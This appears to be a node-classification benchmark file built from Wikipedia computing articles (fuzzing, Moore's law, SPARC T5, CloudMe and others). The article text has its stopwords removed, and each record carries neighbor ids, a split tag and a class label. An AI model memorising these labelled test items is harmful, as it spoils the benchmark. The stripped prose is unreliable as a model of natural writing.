oss-fuzz allows continuous fuzzing several security-critical open-source projects black hat 2018 christopher domas demonstrated use fuzzing expose existence hidden risc core processor core able bypass existing security checks execute ring 0 commands ring 3 fuzzer categorized follows mutation-based fuzzer leverages existing corpus seed inputs fuzzing generates inputs modifying rather mutating provided seeds example fuzzing image library libpng user would provide set valid png image files seeds mutation-based fuzzer would modify seeds produce semi-valid variants seed corpus seed files may contain thousands potentially similar inputs automated seed selection test suite reduction allows users pick best seeds order maximize total number bugs found fuzz campaign generation-based fuzzer generates inputs scratch instance smart generation-based fuzzer takes input model provided user generate new inputs unlike mutation-based fuzzers generation-based fuzzer depend existence quality corpus seed inputs fuzzers capability generate inputs scratch generate inputs mutation existing seeds typically fuzzers used generate inputs programs take structured inputs file sequence keyboard mouse events sequence messages structure distinguishes valid input accepted processed program invalid input quickly rejected program constitutes valid input may explicitly specified input model examples input models formal grammars file formats gui-models network protocols even items normally considered input fuzzed contents databases shared memory environment variables precise interleaving threads effective fuzzer generates semi-valid inputs valid enough directly rejected parser invalid enough might stress corner cases exercise interesting program behaviours smart model-based grammar-based protocol-based fuzzer leverages input model generate greater proportion valid inputs instance input modelled abstract syntax tree smart mutation-based fuzzer would employ random transformations move complete subtrees one node another input modelled formal grammar smart generation-based fuzzer would instantiate production rules generate inputs valid respect grammar however generally input model must explicitly provided difficult model proprietary unknown complex large corpus valid invalid inputs available grammar induction technique angluin l* algorithm would able generate input model dumb fuzzer require input model thus employed fuzz wider variety programs instance afl dumb mutation-based fuzzer modifies seed file flipping random bits substituting random bytes interesting values moving deleting blocks data however dumb fuzzer might generate lower proportion valid inputs stress parser code rather main components program disadvantage dumb fuzzers illustrated means construction valid checksum cyclic redundancy check crc crc error-detecting code ensures integrity data contained input file preserved transmission checksum computed input data recorded file program processes received file recorded checksum match re-computed checksum file rejected invalid fuzzer unaware crc unlikely generate correct checksum however attempts identify re-compute potential checksum mutated input dumb mutation-based fuzzer modified protected data typically fuzzer considered effective achieves higher degree code coverage rationale fuzzer exercise certain structural elements program also able reveal bugs hiding elements program elements considered critical others instance division operator might cause division zero error system call may crash program black-box fuzzer treats program black box unaware internal program structure instance random testing tool generates inputs random considered blackbox fuzzer hence blackbox fuzzer execute several hundred inputs per second easily parallelized scale programs arbitrary size however blackbox fuzzers may scratch surface expose shallow bugs hence attempts develop blackbox fuzzers incrementally learn internal structure behavior program fuzzing observing program output given input instance learnlib employs active learning generate automaton represents behavior web application white-box fuzzer leverages program analysis systematically increase code coverage reach certain critical program locations instance sage leverages symbolic execution systematically explore different paths program program specification available whitebox fuzzer might leverage techniques model-based testing generate inputs check program outputs program specification whitebox fuzzer effective exposing bugs hide deep program however time used analysis program specification become prohibitive whitebox fuzzer takes relatively long generate input blackbox fuzzer efficient hence attempts combine efficiency blackbox fuzzers effectiveness whitebox fuzzers gray-box fuzzer leverages instrumentation rather program analysis glean information program instance afl libfuzzer utilize lightweight instrumentation trace basic block transitions exercised input leads reasonable performance overhead informs fuzzer increase code coverage fuzzing makes gray-box fuzzers extremely efficient vulnerability detection tools fuzzing used mostly automated technique expose vulnerabilities security-critical programs might exploited malicious intent generally fuzzing used demonstrate presence bugs rather absence running fuzzing campaign several weeks without finding bug prove program correct program may still fail input executed yet executing program inputs prohibitively expensive objective prove program correct inputs formal specification must exist techniques formal methods must used order expose bugs fuzzer must able distinguish expected normal unexpected buggy program behavior however machine always distinguish bug feature automated software testing also called test oracle problem typically fuzzer distinguishes crashing non-crashing inputs absence specifications use simple objective measure crashes easily identified might indicate potential vulnerabilities e.g. denial service arbitrary code execution however absence crash indicate absence vulnerability instance program written c may may crash input causes buffer overflow rather program behavior undefined make fuzzer sensitive failures crashes sanitizers used inject assertions crash program failure detected different sanitizers different kinds bugs fuzzing also used detect differential bugs reference implementation available automated regression testing generated inputs executed two versions program automated differential testing generated inputs executed two implementations program e.g. lighttpd httpd implementations web server two variants produce different output input one may buggy examined closely static program analysis analyzes program without actually executing might lead false positives tool reports problems program actually exist fuzzing combination dynamic program analysis used try generate input actually witnesses reported problem modern web browsers undergo extensive fuzzing chromium code google chrome continuously fuzzed chrome security team 15,000 cores microsoft edge internet explorer microsoft performed fuzzed testing 670 machine-years product development generating 400 billion dom manipulations 1 billion html files fuzzer produces large number inputs relatively short time instance 2016 google oss-fuzz project produced around 4 trillion inputs week hence many fuzzers provide toolchain automates otherwise manual tedious tasks follow automated generation failure-inducing inputs automated bug triage used group large number failure-inducing inputs root cause prioritize individual bug severity fuzzer produces large number inputs many failure-inducing ones may effectively expose software bug bugs security-critical patched higher priority instance cert coordination center provides linux triage tools group crashing inputs produced stack trace lists group according probability exploitable microsoft security research centre msec developed exploitable tool first creates hash crashing input determine uniqueness assigns exploitability rating previously unreported triaged bugs might automatically reported bug tracking system instance oss-fuzz runs large-scale long-running fuzzing campaigns several security-critical software projects previously unreported distinct bug reported directly bug tracker oss-fuzz bug tracker automatically informs maintainer vulnerable software checks regular intervals whether bug fixed recent revision using uploaded minimized failure-inducing input automated input minimization test case reduction automated debugging technique isolate part failure-inducing input actually inducing failure failure-inducing input large mostly malformed might difficult developer understand exactly causing bug given failure-inducing input automated minimization tool would remove many input bytes possible still reproducing original bug instance delta debugging automated input minimization technique employs extended binary search algorithm find minimal input
[ 2432, 6274, 5636, 7940, 10756, 9356, 10894, 3473, 8978, 4755, 1429, 5245, 5397, 10392, 5373, 5246, 1179, 4892, 2717, 5404, 2975, 7325, 1954, 3619, 5282, 2213, 5029, 7847, 6184, 7337, 8488, 939, 8998, 3629, 814, 3887, 7855, 9391, 1970, 568...
Test
2,263
0
Voice_computing:voice computing voice computing discipline develops hardware software process voice inputs spans many fields including human-computer interaction conversational computing linguistics natural language processing automatic speech recognition speech synthesis audio engineering digital signal processing cloud computing data science ethics law information security voice computing become increasingly significant modern times especially advent smart speakers like amazon echo google assistant shift towards serverless computing improved accuracy speech recognition text-to-speech models voice computing rich history first scientists like wolfgang kempelen started build speech machines produce earliest synthetic speech sounds led work thomas edison record audio dictation machines play back corporate settings 1950s-1960s primitive attempts build automated speech recognition systems bell labs ibm others however 1980s hidden markov models used recognize 1,000 words speech recognition systems became relevant around 2011 siri emerged apple iphones first voice assistant accessible consumers innovation led dramatic shift building voice-first computing architectures ps4 released sony north america 2013 70+ million devices amazon released amazon echo 2014 30+ million devices microsoft released cortana 2015 400 million windows 10 users google released google assistant 2016 2 billion active monthly users android phones apple released homepod 2018 500,000 devices sold 1 billion devices active ios/siri shifts along advancements cloud infrastructure e.g amazon web services codecs solidified voice computing field made widely relevant public large voice computer assembled hardware software process voice inputs note voice computers necessarily need screen traditional amazon echo embodiments traditional laptop computers mobile phones could used voice computers moreover become increasingly interfaces voice computers advent iot-enabled devices within cars televisions september 2018 currently 20,000 types devices compatible amazon alexa voice computing software read/write record clean encrypt/decrypt playback transcode transcribe compress publish featurize model visualize voice files popular software packages related voice computing voice computing applications span many industries including voice assistants healthcare e-commerce finance supply chain agriculture text-to-speech security marketing customer support recruiting cloud computing microphones speakers podcasting voice technology projected grow cagr 19-25 2025 making attractive industry startups investors alike united states states varying telephone call recording laws states legal record conversation consent one party others consent parties required moreover coppa significant law protect minors using internet increasing number minors interacting voice computing devices e.g amazon alexa federal trade commission recently relaxed copaa rule children issue voice searches commands lastly gdpr new european law governs right forgotten many clauses eu citizens gdpr also clear companies need outline clear measures obtain consent audio recordings made define purpose scope recordings used e.g. training purposes bar valid consent raised gdpr consents must freely given specific informed unambiguous tacit consent longer sufficient many research conferences relate voice computing include google assistant roughly 2,000 actions january 2018 50,000 alexa skills worldwide september 2018 june 2017 google released audioset large-scale collection human-labeled 10-second sound clips drawn youtube videos contains 1,010,480 videos human speech files 2,793.5 hours total released part ieee icassp 2017 conference november 2017 mozilla foundation released common voice project collection speech files help contribute larger open source machine learning community voicebank currently 12gb size 500 hours english-language voice data collected 112 countries since project inception june 2017 dataset already resulted creative projects like deepspeech model open source transcription model
[ 4194, 4995, 7780, 3533, 7887, 4624, 7248, 7537, 10557, 8921, 3323, 5373 ]
Validation
2,264
7
Distributed_shared_memory:distributed shared memory computer science distributed shared memory dsm form memory architecture physically separated memories addressed one logically shared address space term shared mean single centralized memory address space shared physical address two processors refers location memory distributed global address space dgas similar term wide class software hardware implementations node cluster access shared memory addition node non-shared private memory distributed-memory system often called multicomputer consists multiple independent processing nodes local memory modules connected general interconnection network software dsm systems implemented operating system programming library thought extensions underlying virtual memory architecture implemented operating system systems transparent developer means underlying distributed memory completely hidden users contrast software dsm systems implemented library language level transparent developers usually program differently however systems offer portable approach dsm system implementations distributed shared memory system implements shared-memory model physically distributed memory system usually two methods achieving distributed shared memory three ways implementing software distributed shared memory software dsm systems also flexibility organize shared memory region different ways page based approach organizes shared memory pages fixed size contrast object based approach organizes shared memory region abstract space storing shareable objects variable sizes another commonly seen implementation uses tuple space unit sharing tuple shared memory architecture may involve separating memory shared parts distributed amongst nodes main memory distributing memory nodes coherence protocol chosen accordance consistency model maintains memory coherence memory coherence necessary system organizes dsm able track maintain state data blocks nodes across memories comprising system basic dsm track least three states among nodes given block directory state dictate block uncached u state dictate block exclusively owned modified owned em state dictate block shared blocks come directory organization transition u em ownership state initial node state transition nodes begin reading block two primary methods allowing system track blocks cached condition across node home-centric request-response uses home service requests drive states whereas requester-centric allows node drive manage requests home home-centric system dsm avoid handle request-response races nodes allowing one transaction occur time home node decided transaction finished—usually home received responding processor response request example intel qpi home-source mode requester-centric system dsm allow nodes talk home means multiple nodes attempt start transaction requires additional considerations ensure coherence example one node processing block receives request block another node send nack negative acknowledgement tell initiator processing node ca n't fulfill request right away example intel qpi snoop-source mode dsm must follow certain rules maintain consistency read write order viewed among nodes called system consistency model suppose n processes mi memory operations process operations executed sequentially conclude m1 m2 … mn m1 m2 … mn possible interleaves operations issue conclusion determining correctness interleaved operations memory coherence dsm defines interleaves permitted two type replication algorithm read replication write replication read replication multiple nodes read time one node write write application multiple nodes read write time.the write requests handled sequencer replication shared data general tends however preserving coherence consistency may become challenging
[ 8447, 7942, 3594, 785, 7313, 7699, 11539, 3863, 5272, 1049, 7963, 6815, 2210, 5798, 9126, 6184, 2345, 4909, 7983, 50, 7218, 10675, 8501, 5948, 4286, 2113, 8514, 10051, 5956, 8901, 4423, 1480, 6909, 330, 1866, 7497, 8523, 2383, 4308, 2008,...
Test
2,265
4
Rotational_cryptanalysis:rotational cryptanalysis cryptography rotational cryptanalysis generic cryptanalytic attack algorithms rely three operations modular addition rotation xor — arx short algorithms relying operations popular relatively cheap hardware software run constant time making safe timing attacks common implementations basic idea rotational cryptanalysis bit rotation xor operations preserve correlations bit-rotated pairs inputs addition bit-rotated inputs also partially preserves bit rotation correlations rotational pairs inputs thus used see cipher cascaded arx operations greater degree might expected ability see correlations rounds processing exploited break cipher way similar differential cryptanalysis term rotational cryptanalysis coined dmitry khovratovich ivica nikolić 2010 paper rotational cryptanalysis arx presented best cryptanalytic attacks time reduced-round threefish cipher — part skein hash function sha-3 competition candidate follow-up attack authors christian rechberger breaks collision resistance 53 72 rounds skein-256 57 72 rounds skein-512 also affects threefish cipher
[ 7556, 2567, 3084, 2957, 7056, 658, 660, 1173, 1941, 4128, 1315, 4389, 10662, 169, 11185, 2357, 10806, 1847, 9528, 2110, 9541, 10315, 6863, 8273, 7635, 212, 9556, 10963, 11349, 7643, 9697, 8674, 229, 618, 1898, 881, 1654, 7161, 7034, 892 ]
Test
2,266
2
NewWave:newwave newwave discontinued object-oriented graphical desktop environment office productivity tool pcs running early versions microsoft windows beginning 2.0 developed hewlett-packard introduced commercially 1988 used hp vectras ibm compatible pcs running ms windows user perspective newwave ran top ms windows completely replaced standard windows desktop program manager user interface object-oriented desktop interface hp promoted newwave release windows 95 time development product ceased due incompatibility new operating system newwave gui together contemporaneous nextstep gui introduced shaded 3-d look feel later widely adopted hp encouraged independent software vendors produce versions applications took advantage newwave functionality allowing data handled objects instead files one early example samna corporation later acquired lotus produced edition microsoft windows word processor ami pro entitled ‘ ’ ami pro newwave ’ ’ june 20 1988 microsoft corporation hewlett-packard issued press release announcing inclusion newwave support up-coming release microsoft excel newwave featured icons scheduled scripts form agents hot connects hp incorporated newwave multi-platform office automation offerings running proprietary mpe hp-ux unix minicomputer operating systems developed newwave versions key email database document management personal productivity communications network management tools branded related solutions “ hp newwave office ” banner prior integration hp newwave solution set known “ business system plus ” “ newwave office ” term used previously describe main newwave user desktop original november 1987 press release hewlett-packard described newwave “ application environment designed provide personal computer users single method access data files multiple sources company ’ network ” developed hp ’ personal software division psd santa clara california united states part distributed computing environment strategy three years work 100 employees original version newwave ran ibm compatible pcs required ms-dos 3.2 later ms-windows 2.0 later key features newwave included hp described omf means binding applications data together form “ objects ” compound documents addition ms-windows-style indexed help articles newwave introduced context-sensitive help facility allowed user click ‘ help ’ menu option added query symbol mouse arrow switched ‘ help mode ’ user could click part newwave environment menu command help item displayed pop-up window working conjunction newwave agent computer-based training functionality newwave allowed developers build interactive lessons desktop environment applications allowed users learn actual live applications non-destructive way feature dropped later versions newwave due increased disk requirements imposed limited hard disk space available pcs time newwave agent task-recording execution facility could work across multiple applications users could record sequence tasks performed within newwave environment recorded tasks generated basic-like source-code could repeated unmodified edited expanded create sophisticated automated interactive activities newwave included built-in applications fully integrated object management facility newwave agent online help computer based training features non-native newwave applications could integrated environment using “ advanced bridges ” allowing live data embedded compound documents standard end-user version hp newwave included bridges hp ’ pc applications hp graphics gallery ms windows tools calculator calendar notepad etc many common third-party applications users could also create bridges applications using included bridge builder tool bridges could exported use newwave-enabled systems often shared amongst newwave user community hp described newwave write basic-to-intermediate level “ see get ” wysiwig word processor support compound documents newwave mail available separate native newwave product could act client hp ’ proprietary deskmanager openmail email server solutions hp succeeded establishing third-party developer program following release newwave software developer ’ kit sdk february 1988 newwave enabled third-party applications included third-party application bridges shipped end-user release hp newwave included eight-year life hp newwave underwent several functional cosmetic changes including revision desktop interface dropping built-in computer based training facility alleged similarities macintosh gui newwave subject unsuccessful look feel lawsuit apple see apple v. microsoft praising hp serious sincere effort give windows complete object-oriented gui stewart alsop ii 1988 doubted software developers would create software newwave hp considered standard setter ibm microsoft desktop-metaphor plans existing applications needed substantial redesign rewrite effectively use hp newwave never adopted mainstream end-user environment although adopted number corporate clients basis office productivity projects including hp success licensing newwave hardware manufacturers january 1990 hp stated intention provide newwave capabilities unix motif os/2 presentation manager although versions never released hp contribute newwave technology projects run open software foundation hp member articles august 1989 issue hewlett-packard journal volume 40 number 4
[ 576, 5384, 6797, 7983, 6129, 5492 ]
Test
2,267
7
CloudMe:cloudme cloudme file storage service operated cloudme ab offers cloud storage file synchronization client software features blue folder appears devices content files synchronized devices cloudme service offered freemium business model provides encrypted ssl connection ssl extended validation certificate cloudme provides client software microsoft windows macos linux android ios google tv samsung smart tv wd tv windows storage server nas web browsers cloud sync storage provider cloudme strong focus european market differentiates storage providers mobility media features like samsung smarttv support recently novell announced support cloudme service dynamic file services suite novosoft handy backup version 7.3 also announced support cloudme winzip also integrated cloudme many third party mobile apps software available cloudme many using webdav support cloudme cloudme founded daniel arthursson 2012 mainly owned xcerion company runs servers operates sweden european union 2012 cloudme received red herring top 100 global company alwayson global 250 award white bull 2012 yearling award white bull 2014 longhorn award previously cloudme.com called icloud.com service changed name apple acquired domain trademark rumoured 4.5 million dollars visitors icloud.com directed cloudme.com name change former icloud.com service split two companies services cloudme file sync storage cloudtop virtual cloud desktop previously main attraction icloud.com service included file storage xcerion major owner cloudme cloudtop initially gained investment 12 million build icloud service using saas model cloudme service provided free version 3 gb storage 19 gb referral program model often called freemium premium versions either 10 25 100 200 500 gb storage consumers 2 tb 5 tb business closest competitor cloudme dropbox cloudme features cloud storage sync solution allows users store access share content people outside service sharing done email text messaging facebook google files stored blue folder synchronized connected computers devices web desktop cloud os service called cloudtop.com available uses cloudme internet file system cloudme ab located drottninggatan 23 linköping sweden
[ 4869, 2694, 4490, 6797, 4623, 5650, 6565, 7983, 10161, 9394, 823, 7238, 10054, 10185, 1239, 735, 4710, 4970, 8446 ]
Test
2,268
7
Procurify:procurify procurify cloud-based procurement software company located vancouver british columbia canada founded 2013 ceo aman mann cto eugene dong coo kenneth loi procurify main product offering cloud-based procurement solution used manage company spending companies offer procurement solutions typically focus automation company spending real-time current procurify platform considered horizontal rather industry specific procurify cloud based procurement software solution used companies manage organizational purchasing procurement like e-procurement solutions available procurify focuses providing users features including digital purchase order submission accounts payable automation procurify hosted amazon web services built using django solution available saas procurify offered browser-based mobile procurement software company founders bcit school business alumni graduated together operations management 2011 idea procurify came bcit class project founders randomly placed together consult vancouver-based business internal processes november 2012 joined growlab accelerator program february 2013 procurify graduated vancouver-based incubator program growlab april 2014 procurify raised total 1.2 million seed round venture capitalists nexus ventures bdc mark cuban july 2015 procurify raised another seed round totaling 4 million point nine capital nexus venture partners business development bank canada bdc hootsuite ceo ryan holmes chief revenue officer steve johnson also participated round
[ 7248 ]
None
2,269
3
SPARC_T5:sparc t5 sparc t5 fifth generation multicore microprocessor oracle sparc t-series family first presented hot chips 24 august 2012 officially introduced oracle sparc t5 servers march 2013 processor designed offer high multithreaded performance 16 cores per chip 8 threads per core well high single threaded performance chip processor uses sparc s3 core design predecessor sparc t4 processor implemented 28 nm process runs 3.6 ghz s3 core dual-issue core uses dynamic threading out-of-order execution incorporates one floating point unit one dedicated cryptographic unit per core 64-bit sparc version 9 based processor 16 cores supporting 128 threads per processor scales 1,024 threads 8 socket system changes include support pcie version 3.0 new cache coherence protocol chart shows differences t5 t4 processor chips sparc t5 also introduces new power management feature consists hardware support processor software allows system administrator use feature users select policy system responds over-temperature over-current events dynamic voltage frequency scaling aka dvfs policy set maintain peak frequency trade performance power consumption sparc t5 processor used oracle entry mid-size sparc t5-2 t5-4 t5-8 servers servers use processor frequency number cores per chip cache configuration t5 processor includes crossbar network connects 16 cores l2 caches shared l3 cache multiprocessor cache coherence maintained using directory-based protocol design scales eight sockets without additional silicon glueless snoopy based protocol used sparc t4 systems replaced order reduce memory latency reduce coherency bandwidth consumption
[ 5378, 1539, 9090, 9731, 1801, 4235, 6926, 1809, 4241, 1818, 8863, 8353, 8871, 1707, 2731, 5677, 10926, 3247, 6322, 9010, 9012, 1461, 10675, 4664, 10553, 1594, 4285, 6464, 7104, 6338, 9665, 6341, 9541, 2895, 3919, 597, 731, 1755, 6107, 125...
Test
2,270
1
EUROCAT_(medicine):eurocat medicine eurocat european organization describes network population-based registries epidemiological surveillance congenital anomalies covering 1.5 million births 20 countries europe founded 1979 goal improving collection data congenital disorders standardization data published extensions helps provide unique codes individual conditions approximately quarter new births european union reported eurocat
[]
Test
2,271
1
Terminology_model:terminology model terminology model refinement concept system within terminology model concepts object types specific problem subject area defined subject matter experts terms concept object type definitions definitions subordinated concepts characteristics properties besides object types terminology model allows defining hierarchical classifications definitions object type property behavior definition casual relations terminology model means subject matter experts express knowledge subject subject specific terms since terminology model structured rather similar object-oriented database schema transformed without loss information object-oriented database schema thus terminology model method problem analysis one side mean defining database schema side several terminology models developed published field statistics
[ 7331 ]
None
2,272
9
Ralph_Griswold:ralph griswold ralph e. griswold may 19 1934 modesto ca – october 4 2006 tucson az computer scientist known research high-level programming languages symbolic computation language credits include string processing language snobol sl5 icon attended stanford university receiving bachelor degree physics m.s ph.d. electrical engineering griswold went bell labs 1962 studied ideas non-numerical computation snobol outcome radically different language time still became head labs programming research development department 1967 1971 hired university arizona first professor computer science subsequently organized department head 1981 arizona griswold developed icon earlier ratfor implementation icon discarded language rewritten scratch c unix 1990 griswold appointed regents professor retired 1995 one founders bell labs software culture spawned unix c many essential contributions modern software ralph griswold brought academic research brilliance also experience value system demanded research ideas tested fire proven useful usable real users good-looking diagrams academic papers retirement interests turned mathematical aspects weaving griswold died october 4 2006 cancer griswold son bill griswold also computer scientist
[ 10569, 8057, 8262 ]
None
2,273
3
Moore's_law:moore law moore law observation number transistors dense integrated circuit doubles every two years observation named gordon moore co-founder fairchild semiconductor ceo intel whose 1965 paper described doubling every year number components per integrated circuit projected rate growth would continue least another decade 1975 looking forward next decade revised forecast doubling every two years compound annual growth rate cagr 41.4 period often quoted 18 months prediction intel executive david house combination effect transistors transistors faster moore prediction proved accurate several decades used semiconductor industry guide long-term planning set targets research development r advancements digital electronics strongly linked moore law rapid scaling mosfet metal-oxide-semiconductor field-effect transistor devices quality-adjusted microprocessor prices memory capacity ram flash sensors even number size pixels digital cameras digital electronics contributed world economic growth late twentieth early twenty-first centuries moore law describes driving force technological social change productivity economic growth moore law observation projection historical trend physical natural law although rate held steady 1975 around 2012 rate faster first decade general logically sound extrapolate historical growth rate indefinite future example 2010 update international technology roadmap semiconductors predicted growth would slow around 2013 2015 gordon moore foresaw rate progress would reach saturation see moore law dying next decade intel stated 2015 pace advancement slowed starting 22 nm feature width around 2012 continuing 14 nm brian krzanich former ceo intel announced cadence today closer two half years two intel also stated 2017 hyperscaling would able continue trend moore law offset increased cadence aggressively scaling beyond typical doubling transistors krzanich cited moore 1975 revision precedent current deceleration results technical challenges natural part history moore law late 2010s two semiconductor manufacturers able produce semiconductor nodes keep pace moore law tsmc samsung electronics 10 nm 7 nm 5 nm nodes production plans 3 nm nodes whereas pace slowed intel semiconductor manufacturers 1959 douglas engelbart discussed projected downscaling integrated circuit size article microelectronics art similitude engelbart presented ideas 1960 international solid-state circuits conference moore present audience thirty-fifth anniversary issue electronics magazine published april 19 1965 gordon e. moore working director research development fairchild semiconductor time asked predict going happen semiconductor components industry next ten years response brief article entitled cramming components onto integrated circuits within editorial speculated 1975 would possible contain many 65,000 components single quarter-inch semiconductor complexity minimum component costs increased rate roughly factor two per year certainly short term rate expected continue increase longer term rate increase bit uncertain although reason believe remain nearly constant least 10 years reasoning log-linear relationship device complexity higher circuit density reduced cost time 1975 ieee international electron devices meeting moore revised forecast rate semiconductor complexity would continue double annually 1980 would decrease rate doubling approximately every two years outlined several contributing factors exponential behavior shortly 1975 caltech professor carver mead popularized term moore law despite popular misconception moore adamant predict doubling every 18 months rather david house intel colleague factored increasing performance transistors conclude integrated circuits would double performance every 18 months moore law came widely accepted goal industry cited competitive semiconductor manufacturers strove increase processing power moore viewed eponymous law surprising optimistic moore law violation murphy law everything gets better better observation even seen self-fulfilling prophecy however rate improvement physical dimensions known dennard scaling mosfet scaling slowed semiconductor manufacturers recent years much industry shifting circa 2016 using semiconductor scaling driver focus meeting needs major computing applications april 2005 intel offered us 10,000 purchase copy original electronics issue moore article appeared engineer living united kingdom first find copy offer intel late 2010s two semiconductor manufacturers able produce semiconductor nodes keep pace moore law tsmc samsung electronics 10 nm 7 nm 5 nm nodes production plans 3 nm nodes whereas pace slowed intel semiconductor manufacturers cost computer power consumer falls cost producers fulfill moore law follows opposite trend r manufacturing test costs increased steadily new generation chips rising manufacturing costs important consideration sustaining moore law led formulation moore second law also called rock law capital cost semiconductor fab also increases exponentially time numerous innovations scientists engineers sustained moore law since beginning integrated circuit ic era key innovations listed examples breakthroughs advanced integrated circuit semiconductor device fabrication technology allowing transistor counts grow seven orders magnitude less five decades computer industry technology road maps predicted 2001 moore law would continue several generations semiconductor chips depending doubling time used calculations could mean hundredfold increase transistor count per chip within decade semiconductor industry technology roadmap used three-year doubling time microprocessors leading tenfold increase decade intel reported 2005 stating downsizing silicon chips good economics could continue following decade 2008 predicting trend 2029 one key challenges engineering future nanoscale transistors design gates device dimension shrinks controlling current flow thin channel becomes difficult compared finfets gate dielectric three sides channel gate-all-around mosfet gaafet structure even better gate control new technology advances may help sustain moore law improved performance without reduced feature size physical limits transistor scaling source-to-drain leakage limited gate metals limited options channel material reached new avenues continued scaling open promising approaches rely using spin state electron spintronics tunnel junctions advanced confinement channel materials via nano-wire geometry comprehensive list available device choices shows wide range device options open continuing moore law next decades spin-based logic memory options developed actively industrial labs well academic labs vast majority current transistors ics composed principally doped silicon alloys silicon fabricated single nanometer transistors short-channel effects adversely change desired material properties silicon functional transistor several non-silicon substitutes fabrication small nanometer transistors one proposed material indium gallium arsenide ingaas compared silicon germanium counterparts ingaas transistors promising future high-speed low-power logic applications intrinsic characteristics iii-v compound semiconductors quantum well tunnel effect transistors based ingaas proposed alternatives traditional mosfet designs research also showing biological micro-cells capable impressive computational power energy efficient various forms graphene studied graphene electronics eg graphene nanoribbon transistors shown great promise since appearance publications 2008 bulk graphene band gap zero thus used transistors constant conductivity inability turn zigzag edges nanoribbons introduce localized energy states conduction valence bands thus bandgap enables switching fabricated transistor example typical gnr width 10 nm desirable bandgap energy 0.4ev research need performed however sub 50 nm graphene layers resistivity value increases thus electron mobility decreases semiconductor industry forecasters including gordon moore expect moore law end around 2025 april 2005 gordon moore stated interview projection sustained indefinitely ca n't continue forever nature exponentials push eventually disaster happens also noted transistors eventually would reach limits miniaturization atomic levels 2016 international technology roadmap semiconductors using moore law drive industry since 1998 produced final roadmap longer centered research development plan moore law instead outlined might called moore strategy needs applications drive chip development rather focus semiconductor scaling application drivers range smartphones ai data centers new initiative generalized roadmapping started ieee initiative rebooting computing named international roadmap devices systems irds technological change combination better technology 2011 study journal science showed peak rate change world capacity compute information 1998 world technological capacity compute information general-purpose computers grew 88 per year since technological change clearly slowed recent times every new year allowed humans carry roughly 60 computation possibly could executed existing general-purpose computers year still exponential shows rate technological change varies time primary driving force economic growth growth productivity moore law factors productivity moore 1995 expected rate technological progress going controlled financial realities reverse could occur around late-1990s however economists reporting productivity growth key economic indicator innovation acceleration rate semiconductor progress contributed surge u.s. productivity growth reached 3.4 per year 1997–2004 outpacing 1.6 per year 1972–1996 2005–2013 economist richard g. anderson notes numerous studies traced cause productivity acceleration technological innovations production semiconductors sharply reduced prices components products contain well expanding capabilities products alternative source improved performance microarchitecture techniques exploiting growth available transistor count out-of-order execution on-chip caching prefetching reduce memory latency bottleneck expense using transistors increasing processor complexity increases described empirically pollack rule states performance increases due microarchitecture techniques approximate square root complexity number transistors area processor years processor makers delivered increases clock rates instruction-level parallelism single-threaded code executed faster newer processors modification manage cpu power dissipation processor makers favor multi-core chip designs software written multi-threaded manner take full advantage hardware many multi-threaded development paradigms introduce overhead see linear increase speed vs number processors particularly true accessing shared dependent resources due lock contention effect becomes noticeable number processors increases cases roughly 45 increase processor transistors translated roughly 10–20 increase processing power hand processor manufacturers taking advantage 'extra space transistor shrinkage provides add specialized processing units deal features graphics video cryptography one example intel parallel javascript extension adds support multiple cores also non-general processing features chips part migration client side scripting toward html5 negative implication moore law obsolescence technologies continue rapidly improve improvements may significant enough render predecessor technologies obsolete rapidly situations security survivability hardware data paramount resources limited rapid obsolescence may pose obstacles smooth continued operations toxic materials used production modern computers obsolescence properly managed may lead harmful environmental impacts hand obsolescence may sometimes desirable company profit immensely regular purchase often expensive new equipment instead retaining one device longer period time industry well aware may utilize planned obsolescence method increasing profits moore law affected performance technologies significantly michael s. malone wrote moore war following apparent success shock awe early days iraq war progress development guided weapons depends electronic technology improvements circuit density low-power operation associated moore law also contributed development technologies including mobile telephones 3-d printing several measures digital technology improving exponential rates related moore law including size cost density speed components moore wrote density components component transistor resistor diode capacitor minimum cost transistors per integrated circuit – popular formulation doubling number transistors integrated circuits every two years end 1970s moore law became known limit number transistors complex chips graph top shows trend holds true today density minimum cost per transistor – formulation given moore 1965 paper density transistors achieved density transistors cost per transistor lowest transistors put chip cost make transistor decreases chance chip work due defect increases 1965 moore examined density transistors cost minimized observed transistors made smaller advances photolithography number would increase rate roughly factor two per year dennard scaling – suggests power requirements proportional area voltage current proportional length transistors combined moore law performance per watt would grow roughly rate transistor density doubling every 1–2 years according dennard scaling transistor dimensions scaled 30 0.7x every technology generation thus reducing area 50 reduces delay 30 0.7x therefore increases operating frequency 40 1.4x finally keep electric field constant voltage reduced 30 reducing energy 65 power 1.4x frequency 50 therefore every technology generation transistor density doubles circuit becomes 40 faster power consumption twice number transistors stays exponential processor transistor growth predicted moore always translate exponentially greater practical cpu performance since around 2005–2007 dennard scaling appears broken even though moore law continued several years yielded dividends improved performance primary reason cited breakdown small sizes current leakage poses greater challenges also causes chip heat creates threat thermal runaway therefore increases energy costs breakdown dennard scaling prompted switch among chip manufacturers greater focus multicore processors gains offered switching cores lower gains would achieved dennard scaling continued another departure dennard scaling intel microprocessors adopted non-planar tri-gate finfet 22 nm 2012 faster consumes less power conventional planar transistor quality adjusted price equipment – price information technology computers peripheral equipment adjusted quality inflation declined 16 per year average five decades 1959 2009 rate quality-adjusted microprocessor price improvement likewise varies linear log scale microprocessor price improvement accelerated late 1990s reaching 60 per year halving every nine months versus typical 30 improvement rate halving every two years years earlier later laptop microprocessors particular improved 25–35 per year 2004–2010 slowed 15–25 per year 2010–2013 number transistors per chip explain quality-adjusted microprocessor prices fully moore 1995 paper limit moore law strict linearity transistor count definition 'moore law come refer almost anything related semiconductor industry plotted semi-log paper approximates straight line hesitate review origins restrict definition hard disk drive areal density – similar observation sometimes called kryder law made 2005 hard disk drive areal density several decades rapid progress areal density advancement slowed significantly around 2010 noise related smaller grain size disk media thermal stability writability using available magnetic fields fiber-optic capacity – number bits per second sent optical fiber increases exponentially faster moore law keck law honor donald keck network capacity – according gerry/gerald butters former head lucent optical networking group bell labs another version called butters law photonics formulation deliberately parallels moore law butters law says amount data coming optical fiber doubling every nine months thus cost transmitting bit optical network decreases half every nine months availability wavelength-division multiplexing sometimes called wdm increased capacity could placed single fiber much factor 100 optical networking dense wavelength-division multiplexing dwdm rapidly bringing cost networking progress seems assured result wholesale price data traffic collapsed dot-com bubble nielsen law says bandwidth available users increases 50 annually pixels per dollar – similarly barry hendy kodak australia plotted pixels per dollar basic measure value digital camera demonstrating historical linearity log scale market opportunity predict future trend digital camera price lcd led screens resolution great moore law compensator tgmlc also known wirth law – generally referred software bloat principle successive generations computer software increase size complexity thereby offsetting performance gains predicted moore law 2008 